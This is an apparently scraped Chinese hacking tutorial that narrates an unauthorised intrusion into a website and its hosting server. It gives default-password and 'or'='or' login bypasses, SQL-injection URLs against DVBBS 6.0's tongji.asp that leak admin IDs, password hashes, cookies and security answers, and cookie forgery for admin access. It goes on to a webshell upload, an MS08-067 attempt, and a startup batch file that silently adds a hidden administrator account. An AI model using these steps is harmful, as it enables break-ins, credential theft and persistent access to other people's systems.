入侵提权全过程网站安全 -电脑资料

   

    入侵提权全过程

    我是黑霸，QQ：624475210 给大家一个入侵到提权的实力教程，

入侵提权全过程网站安全

。呵呵感觉不错，对于没有服务器的可以试下。

    目标站 www.***.com

    首先我们要拿这个站的webshell

    1.我们先进这个站转转，注册个号看下帐号的功能和网站程序。

    2.找网站的后台，我们用明小子来查后台很快我们得到结果后台地址 /admin/admin_login.asp

    2.得到后台我们首先试下默认帐号密码 admin、admin888、'or'='or'等，默认的无效。

    3.接着找上传漏洞，我们用明小子找到upfile.asp和upfile other.asp我们来试下上传小马。很遗憾无效

    4.找注入点，用明小子来找，首先明小子打开百度在设置下，然后查inurl:asp?id= site:xxx.com 接着当注入点出现。。出了好几个，看下效果如何。。哎。！没用。

    5.前面都没效果哎。我们找下服务器的网站，看下这服务器上的网站，我们随便找了下，http://www.xxx.com 进去看看是个DVBBS VER 6.0.0的论坛，然后我们找管理员的名字，在地址栏中输入http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=1。看到其中的管理员的名字了吗？OK，接下来在地址栏中输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20userclass,”，这样就会查到这些人在论坛中的身份，注意其中的管理员身份的人，他具有最高权限， 的目标就是他。下一步，请在地址栏中输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20userid,”，回车后在你看到的窗口中记住管理员的ID在论坛中是第几位注册用户，假设为1。再下一步，在地址栏中输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20userpassword,”，这样你就会看到论坛中用户的密码，可惜是经过MD5加密处理的，但这已经足够了。最后再输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20usercookies,”，回车后在出现的窗口中记下管理员的usercookies的值，一般为0。好了，到现在 就得到管理员的Cookies的内容了，他可以通过在本机中伪造管理员的Cookies来入侵论坛。如果你输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20quesion,”，还可以得到论坛中用户忘记密码时的密码提示问题，输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20answer,”可以得到他的问题答案..

    接下来在该论坛新注册一个新用户，然后用Cookies欺骗软件改自己在该论坛的Cookies，

电脑资料

《入侵提权全过程网站安全》(https://www.unjs.com)。其实，这一步的目的就是通过Cookies来让论坛以为你就是管理员，因为论坛判定是否是管理员的主要方法就是通过论坛ID和密码来实现的，而Cookies中记录的正是论坛ID和密码，当然这个密码是加密存放在Cookies中的。 呵呵进去了，接着就是上传图片了，在来就是备份了，都很顺利，我们传大马上去，这个服务器很烂，目录是E:\www\可以访问但没权限不能写，我找下刚的目标站，呵呵进来了，看到了进去下他数据库，哎，MD5加密了。不过我们有了这个webshell，来把它提权吧。

    6.提权，先看下SHELL的组件支持，没wscript.shell 所以要CMD是不可能的。接着serv-u来提权c:\Program Files\RhinoSoft.com\serv-u，看下有没权限，

    饿，没写的权限，晕！

    看3389信息

    [特殊端口探测]

    --------------------------------------------------------------------------------

    Telnet端口:

    Terminal Service端口为:3388

    他的3389端口是3388呵呵来试下开始-运行-mstsc 输入xx.xx.xx.xx:3388 呵呵连接上，可是没帐号晕

    看下它开了什么端口

    呵呵135，139，445，1433，开了445我们用下MS08067来看看

    SMB Connect OK!

    Maybe Patched!

    表明目标已经打上补丁了。

    遗憾，没用不过我们没服务器的情况下怎么来抓这台呢。

    首先来废话下，我们都知道系统启动时会加载自动启动项，我们建立个1.bat内容

    net user hackb$ 123456 /add

    net localgroup administrators hackb$ /add

    来建立用户，把他上传到

    C:\Documents and Settings\All Users\「开始」菜单\程序\启动

    等管理员把电脑重起了就有我们的帐号了。呵呵，

    教程完。。